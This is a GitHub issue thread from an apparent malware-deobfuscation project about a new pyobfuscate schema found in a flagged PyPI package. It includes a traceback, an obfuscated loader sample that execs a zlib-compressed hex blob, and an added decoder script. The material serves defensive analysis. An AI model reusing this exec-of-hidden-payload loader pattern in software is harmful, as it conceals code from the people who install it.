
[FIX] pyobfuscate not being detected/deobfuscated properly #49

Open
IlluminatiFish opened this issue Jul 16, 2024 · 2 comments
Assignees
Labels
bug Something isn't working

Comments

@IlluminatiFish
Member

https://inspector.pypi.io/project/whoisbuild/1.0.1/packages/91/2b/0be0b33c7a81a7bd66820ac29d02245f6b90efbecd8729d100de73cd3bae/whoisbuild-1.0.1.tar.gz/whoisbuild-1.0.1/whoisbuild/utils.py

For some reason this pyobfuscate sample is neither detected nor deobfuscated properly, even when the obfuscation schema is supplied explicitly.

@IlluminatiFish IlluminatiFish changed the title pyobfuscate not being detected/deobfuscated properly [FIX] pyobfuscate not being detected/deobfuscated properly Jul 16, 2024
@IlluminatiFish IlluminatiFish added the bug Something isn't working label Jul 16, 2024
@FieryIceStickie
Member

This seems to have been further obfuscated after the pyobfuscate, if not a different obfuscation schema entirely. I'll look into it and see if this should be added into the existing pyobfuscate deobf, or be its own thing entirely.

@Realswitzer
Contributor

Realswitzer commented Aug 8, 2024

Seemingly pyobfuscate uses a new schema. Generated 3 samples earlier and none were deobfuscated. Tested with a simple one line program (print("hi")), and the file contents look similar to the whoisbuild sample included above.

Tested on latest version @ a1c7ee2

```text
switzrr@switz-nyarch ~/dev/mal/testing % vipyr-deobf -ds -t=pyobfuscate pyobfuscate-2.py
[2024-08-08 07:58:10,176]:INFO:Running deobf of pyobfuscate-2.py with schema <pyobfuscate>
[2024-08-08 07:58:10,176]:INFO:Running pyobfuscate
[2024-08-08 07:58:10,177]:ERROR:Payload not found
[2024-08-08 07:58:10,177]:INFO:Code has been deobfuscated successfully
Traceback (most recent call last):
  File "/home/switzrr/.local/bin/vipyr-deobf", line 8, in <module>
    sys.exit(run())
             ^^^^^
  File "/home/switzrr/dev/vipyrsec-deobfuscator/src/vipyr_deobf/cli.py", line 160, in run
    output = run_deobf(data, schema)
             ^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/switzrr/dev/vipyrsec-deobfuscator/src/vipyr_deobf/cli.py", line 73, in run_deobf
    return format_func(*results) if isinstance(results, tuple) else format_func(results)
                                                                    ^^^^^^^^^^^^^^^^^^^^
  File "/home/switzrr/dev/vipyrsec-deobfuscator/src/vipyr_deobf/deobfuscators/pyobfuscate.py", line 136, in format_pyobfuscate
    webhooks = WEBHOOK_REGEX.findall(deobfed_code)
               ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
TypeError: expected string or bytes-like object, got 'NoneType'
```

Apologies in advance for the sample; it ends up breaking markdown, so trying to use code tags is annoying.

Obfuscated sample, formatted with `black`:

```python
pyobfuscate = lambda getattr: [
    ((lambda IIlII, IlIIl: setattr(__builtins__, IIlII, IlIIl))(IIlII, IlIIl))
    for IIlII, IlIIl in getattr.items()
]
Il = chr(114) + chr(101)
lI = r"[^a-zA-Z0-9]"
lIl = chr(115) + chr(117) + chr(98)
lllllllllllllll, llllllllllllllI, lllllllllllllIl, lllllllllIIllIIlI = (
    __import__,
    getattr,
    bytes,
    exec,
)

__import__("sys").setrecursionlimit(100000000)
lllllllllIIllIIlI(
    llllllllllllllI(
        lllllllllllllll(lllllllllllllIl.fromhex("7a6c6962").decode()),
        lllllllllllllIl.fromhex("6465636f6d7072657373").decode(),
    )(
        lllllllllllllIl.fromhex(
"789ced5deb6eeb380e7e95ecafda6d26c8fe4d91579817080221a74dbb01d2e620cdc1cc60b1efbebe5b122f2265e5d21c07834e2d8914f9f12345db6d8f31cbfde6e3c7eb666216a77f7e6eb347933f9bb9597e9d8ecfa6fc2c5f772fa762a85b375f98f9cc9897c3ebd698d9cbc16c8eef2f875f9fa77abd59fe79f8dc16dfcf97665e0e2d8dc95685ca2c9f16ff554bb26a789ed92acba97e6c61aa116751b1a05a98aff366ab4262b57e26b7403e8d178bdd697b9c12738557b58219ae0399b247b23ccf57a61c58545f1fabafeb278d3e4bd72a33f5f463ade8a9fa5a60d07aeadb5f44b25cffb2df7c7d1933850b166ffbc3e6e47b6fec00eb11688cad6d55391b29e6c89318d5bcf25c5c1c8eaf537f6cb5761071c9e01a520ed56a135106f329f7c36bedd727c3b2a0fe1c59e8b3e1757774b9402ffddc7c6cfbb5c358915535054a54fee545b1997b5eb680fe67fbf714b1ed7d8b7bd18afd3cfc350583effbc38fcdfe6bea7af3be3d6d4ea7a3635c5624d54acfc1ac4ff938120f50d08f583a942a8aa16902031c13d26819a884280bd14a6bc595eabab6a770f2c284c11414a5cf4fc4f2d326d0cbe1e3e7be4ac8bedebdedf67d2e92c5b23161dad64bec33a086763389626deb33646cea9d1eb3e6ffcd7ef8fe79378dcf3b57054a797e068345e2a9736518c1a35d0a1eab6d6529bb4bef34151310d684685f7be87d2a0c844d551738024467646b46ad4f4e6c5bb6ece0a606ad4ee5a7ad1dc5dd0a595fba45fffd5f7de710dbdb2608537c9e26e489d570e7ba6e6eb50eb02bcb84758eaf9acd554c318cb99be865a24ef50a1545f96cc2487cbd90cf89e403a2917c089ca94a5ed8b44d9977dd5388652f9821b70fed5389597d91b5924ab176b3d8434be8d5372f67f649c1b4a559d2ee2d0d4f7d6fc65cbe5c2e737dbe2d71d3be355624eafba44af445a094f8a335d6bd856c9f33d56ddf154a4a1c8ebe6c4cef714ec46d49ea34c304fc32695f0ce9e102a5c4cb234e036f99a46c63495b496574fa16c731a15a7bb0a0c1f01d103c331058dcadc7df1b347947cbe75846463d0cb1d70e3b24cf734a6295bf3fde24c7a0fff8de2a6f5523d76d99e58ff66600b22767752b9365fe7028f473545309c4ee0dc7c91a2ddbd3f91ac4bf7cecb1dd7f6d81359531f3019ae1161c2ff3fced70ac7cdc7d961d606e3deac79f49fa66d48c58748752dc6d9b1b568744a2b85672ce6b8fc50a2ecb9a173eb3ceac790340fda4a4c480f4d9ba91288c58a32f5ffa5b0b2b4eed4586589e4176d9cb8aef71ce0baa1581530513f7c85a70620c6bf94d577cc19b44746f67eb5698eb2d613739657730b064015b9177969812fb2b7140516f8f25c0bb40121b383bc891a5822a896
67720f13f18806d8fb401a85b7ce781bca956465a785b328df3891b86012c9f72c43ce2d0ca2ceb2df3ea89be56b64561061717d74ff678f57f7bc45f005778eadcf4c397a15a48c58e09e59729be01a193b0159b6acca794335e5bb300b19a2bebfac08ee08af3d13f869b0e174fc5b8998d0cc4a95f46f10086f71a03fe28300ca5b2ad065b40f19fc209ae9fc532349cf59c39b6343f0b5451e3422d021865a8fa660fcdf690f5420f67025a21d603610a279f059298bb6a15c595b6b4774e5ebe315502f2c980c7528bf5d5f875b6fddc46e5245c00ab2f33e08f02c3509ebb1c840b54c9e1ec4ea8257841b21fc537603463a5bd5c406c5bd5ad5455c10406e2b0fe535f563151de2e1d5178bb1964b853069747f67515aa354a6d7777f61385a18586da3074b81b7c2cbb5d144751201af6b41c3ec41fc63c5c8b0c41c25b11f7fc8584908a5002092900ed9c1b70192da232c7d724edba8979e5b410666d62313c54022991b7876928ef91743c5b22a11ab9cb39116a1f18f4aa9198676eceedc0b5ef01a083d8920b0cf8a3c0b0206b34d470b7478d09dd5fcfd84b4f829ff53eb7d3a43349294c204cadd08fc19d7837c46470b80c61818fa35970734e15631de283ee20b39520265f061336c108211edf1b3ce25d9c186e22d6b878dcefd94ca0c20149db840fd350de23e978b68c7d651aee4240a03c035a35423c29be6293886000042f33e08f022c83e1d7c4d8dd1e35666c10d9eca2b8333688b8f932c083f671aa1807c61e5204954042ee453d37f6905e9052f490c4761c9012797b9886f21e49c7b365ec2107721722010519b4aa11af791c9b46641460188cb726a8eef6a83163d3c8a613c59db169c4cd97011eb48f53c53830368d22a80412722feab9b169f48234a869c4b7e100a46dc1876908ef916c3c4bc666310567b19da03c035a35021e385ef77d343417f3f177ec1b7905f81452e6eeb09b144cf8e340b12093d86d7067c61e04107bace7fddcd8839c936c3c4bc61e240567b19da03c035a3582bcf41cf88b8c313acef3db35183cbf5b3f83ed4ea84514cebcf900b582fa382bede5fc2c50357643bc8bb7ff6b350cb780f10e9765c820e6b976aa354a5d747776ae584ac3a9000fa21a1a34109ac3d2318a07480e1fe20f631eae458620e12d4502a060e686f32e7a3786b1416b5c3ceeb3e962b6e38094c8dbc33494f7483a9e2d91508ddca5ec40c4e010035f35d236fe83ef176ee26681741a2cbfcc803f0a0c0b5249c317747b67f7c85ed0578ce22b6b8a302bede5fc2c5075fe0643053637818148d6ae90e7211891e5faded29f42d9a5afb1c8263ce349c73489f26d881532407d0c33f0a1e542c85f6e0ee084a10f4980f502d026e792ba2b8eab9
9848fae30bd88b09fd87e7cbd81c03f767efd1c49042590b44df8300de53d928e674b24542377fd0988085420e53673bc7157d41e429e883c17915cce0e553609fc707776ae18afb4e107f1c7dde0e3daeda2c807c7281e20397c883f8c79b8161982bcb7288243ea20afc270ecd31d4e88c8b92ce724d8672991b5a95b5c3f11b981a720080260d96506fc5100211a2c5b8d2c6db0edb1f4e6f6a6314655f5b2fc2c5075fe3a22c5076be4e4ce00b4d10e86fa6ba60877345d8fb75d7873b12f6e20987da08de3f9785e5ed3dee2e8210a666e38837d9a688a979002d0ce090e3f400b8ab1416b5c3c545ef8f3ca6921ccdac41adff45d86743c5b22a11ab98bc28e1d7ea2b2d82dc67eb82ffa7ddf0d74b8b80e6cf16506fc51108f208d345c71b7478d197f4536481ca082746ae6ef2df0e39bff8a2ce94790fa123b6996b443c2138fcf2051404374fba6e4174c04f90704034c89ab5f9cf300375425cf3e820038f6e92ab02f4c2fc2ba227afbf19d2102ffd843f6737ddd5263479b810fd3e8dd23cf7882444235d2b507287cdc00b48491f3dd0b976bc6475a4d4805ea215dfe895d93f673418988b7316275ae0922bde9ac94d965dc645513d4f1d0bf11bff69d34b4165b7281017f5496e7b61a6c01c503777bd498f1fe994d495405e9d4ccdf5be0c71ddc3f33f8517631bca0acfb5e671085099b6084108fef0d36902e4e0c37116b5c3ceeaaf3a37552a301e802a1a7a1bc47d2f16c89846ae42e6507d811ea61c0ab46ec1ef1da1d228a03e6e36fd7248e3f4ce4e283154eb93321b4898501577029313a0cdb9c2b3642f2cd9a496516506b102f5d0b18fe7e338ad2de526c010a666e38efe2e467181bb4c6c5e30e8f6c615e9da177ba4fb2f12c89846ae4ac1306c0e0d8c632fe57fdf592917f5e2066b7aefb5d350ba6a67e685cae6a519c3a7359ee5e334b1b3dac34b6649de4df2ae55c5a27fe27af6e0a3e6409eeef25bc45761efe67f6ae102614c5384f2ef5638443ffca329123df2f4960e65fac9c5fc079a2965dd9d0f5b0dfed5aadd3fc919d01d2b717697d89ba7d1f50f6debed9fa148dcb87a1c83812fdb2e263eaf1c74753b7cde5d7dcb932fd35be3a772ba9a51e575e0f833df06190fdbdfa7abd23e61a1a32db8b841c174221be7be7491e73e604bc075f699f24c1a01c93e1e97535fede5e8c3a5c08f6400785511d54fa442ec8708a7174489418fc65d6b7d351e467b209456350e20ee9c4064457502db982c5cb3b83ee1857a9c42a197e18797aa99330497c140686aa10cc2d829f743167b86ea4b92c1c0e1e7fce86227e0efc971a258e0bec08321b712f1170aafe836e4b34a732724ea7baad8ea90b2004f1dd61ab44787874f8058b91b235ed14c
bfa45fe8485d6463db2097988ee15aa3b898e58bc6e8a739b0d43f8d412c480ca4059dbd77e526553341913966e1b5633fc8cd3a48e2669e4f75e4270fad0a6eb2524c74e28238cd17554ad50f49b9de1a759f41d6fa7970dabc3503d9128da4637dc06e6191f91ee93a66e84771edad3daba759d6678cbc806776019218292ec89176ec2f978272dbd11e14dd166eb1e0db83a13bd3da5501c9a31127f1d87529d6042962126845b728969ea5e3cf2258d2668eafe66d04da1e2fe5c71726a8a5a3ee41d926eabb3d6875ac5a003487cffa1baa38ebb2b38c7d38e044ecaab92febe8d3d80848f8ca26ee4d894683fe77b1da26b36148109bee7093eda88d3a9a8b708d4699f5d70d82678421775372239b0d5376be25ef03cfd1b9a34672b62f2c8a5e2462826e7e977e29e11e6f5ebfbe2bfe72e12abac5602345563edcf03ccea8b222ec46a67a93fe18981b5bc6a4a3d2e451ac2ecc3c91052bc48d023549c154224029be0261242943ffe72775d35bb7ece9a1f5b9964cd779397c3eb7631d9febd3b65e5b7799efd3b9fecde269f87d3e465b3df6f7eecb7d9fbf6b4399d8e05577ffcdaed4fbbcf2f63a6938797c3c7cfdd7efb309dfc79f82c442787e3045b3a6b161622c67c1c5e7fedb7c614520f0ff9e45fcbc943bbf241a4e073f3e18ab7664cb6fbaf6d634a56274e0d5175517e9b1124a0a60acc5678ad5e3f2954956a2a41955442031c23cc3acfe2e15898be94ab6df00d51c967ab75a4a461816c7fe6a93ec6fae32c81ea6f4d92fcffc604324a".replace(
                "\n", ""
            )
        )
    ).decode()
)
```

Using a longer script, it generated the following to run the payload:

```python
import base64
import zlib

# Custom base64 alphabet: characters from `fromstring1` are mapped positionally
# onto the standard alphabet before a normal b64decode.
fromstring1 = "-_+!1@2#3$4%5^6&7*8(9)0qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFG"
alphanumeric = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
lIlllllIl = "ihQlwp=="
lIIIIIlI = "e2)dtYTmyh)Eym=="
IlIlIlIIIIllI = "uq*h%(p="
IllIIllIlll = "+p=="


def fromb64(base64str):
    # Translate the custom alphabet back to standard base64, then decode.
    fromstring = (
        "-_+!1@2#3$4%5^6&7*8(9)0qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFG".encode()
    )
    alphanum = (
        "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/".encode()
    )
    translatedbytes = bytes.maketrans(fromstring, alphanum)
    return base64.b64decode(base64str.translate(translatedbytes)).decode()


# `payload` is the hex blob emitted by the obfuscator (not included in this comment);
# "!" and newline filler is stripped before the hex is decoded and zlib-inflated.
exec(
    zlib.decompress(bytes.fromhex(payload.replace("!", "").replace("\n", ""))).decode(
        "utf-8"
    )
)
```

I'm confident enough saying that this is a new version/schema of pyobfuscate.
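As an added example, not part of this issue thread or of the vipyr-deobf code base, the following stand-alone script decodes the two layers visible in the samples above: the hex payload passed to `zlib.decompress` (with `!` and newline filler removed) and the custom-alphabet base64 helper. The marker strings `7a6c6962` (`zlib`) and `6465636f6d7072657373` (`decompress`) are taken from the sample; the function names, the detection regex and the `build_sample` helper, which constructs a sample in the same shape rather than using the whoisbuild package, are my own. It also shows the failure mode from the traceback above: a deobfuscator that returns `None` when the payload is missing lets the formatter crash with a `TypeError`, so this version raises a clear error instead.

```python
"""Decoder for the pyobfuscate-style layering discussed in this issue (added example)."""
import base64
import re
import zlib

# Markers seen in the sample: bytes.fromhex("7a6c6962") == b"zlib",
# bytes.fromhex("6465636f6d7072657373") == b"decompress".
ZLIB_MARKER = "7a6c6962"
DECOMPRESS_MARKER = "6465636f6d7072657373"

# A long hex literal handed to fromhex(...), possibly split over lines and padded
# with "!" filler (the variant in the second sample). Assumed pattern, not the tool's.
PAYLOAD_RE = re.compile(r'fromhex\(\s*"{1,3}([0-9a-fA-F!\s]{32,})"')

# Custom base64 alphabet from the second sample, mapped positionally onto the
# standard alphabet.
FROMSTRING = "-_+!1@2#3$4%5^6&7*8(9)0qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFG"
ALPHANUM = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
_TRANS = bytes.maketrans(FROMSTRING.encode(), ALPHANUM.encode())


def looks_like_pyobfuscate(src: str) -> bool:
    """Cheap detection: both hex-encoded names plus a long hex payload are present."""
    return (
        ZLIB_MARKER in src
        and DECOMPRESS_MARKER in src
        and PAYLOAD_RE.search(src) is not None
    )


def extract_payload(src: str) -> str:
    """Strip filler from the hex literal, decode it and inflate the zlib stream."""
    match = PAYLOAD_RE.search(src)
    if match is None:
        raise ValueError("payload not found")
    hexdata = re.sub(r"[!\s]", "", match.group(1))
    return zlib.decompress(bytes.fromhex(hexdata)).decode("utf-8")


def fromb64(encoded: str) -> str:
    """Decode a string written in the sample's custom base64 alphabet."""
    return base64.b64decode(encoded.encode().translate(_TRANS)).decode()


def deobfuscate(src: str) -> str:
    """Return the recovered payload or raise; never hand None to a formatter."""
    if not looks_like_pyobfuscate(src):
        raise ValueError("not a pyobfuscate-style sample")
    return extract_payload(src)


def build_sample(plain: str) -> str:
    """Construct a sample in the shape shown above (test input only, not real malware)."""
    hexdata = zlib.compress(plain.encode()).hex()
    lines = [hexdata[i : i + 64] for i in range(0, len(hexdata), 64)]
    body = "!\n".join(lines)  # newline plus "!" filler, as in the second variant
    return (
        "a, b, c, d = (__import__, getattr, bytes, exec)\n"
        'd(b(a(c.fromhex("7a6c6962").decode()), c.fromhex("6465636f6d7072657373").decode())'
        '(c.fromhex("""' + body + '""".replace("\\n", "").replace("!", "")).decode())\n'
    )


if __name__ == "__main__":
    sample = build_sample('print("hi from constructed sample")')
    print(deobfuscate(sample))
    print(fromb64("ihQlwp=="), fromb64("e2)dtYTmyh)Eym=="))
```

Running it prints the recovered one-liner followed by `zlib decompress`, which is what the two custom-alphabet strings from the second sample decode to; the same `fromb64` reveals the other two strings in that sample as well.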
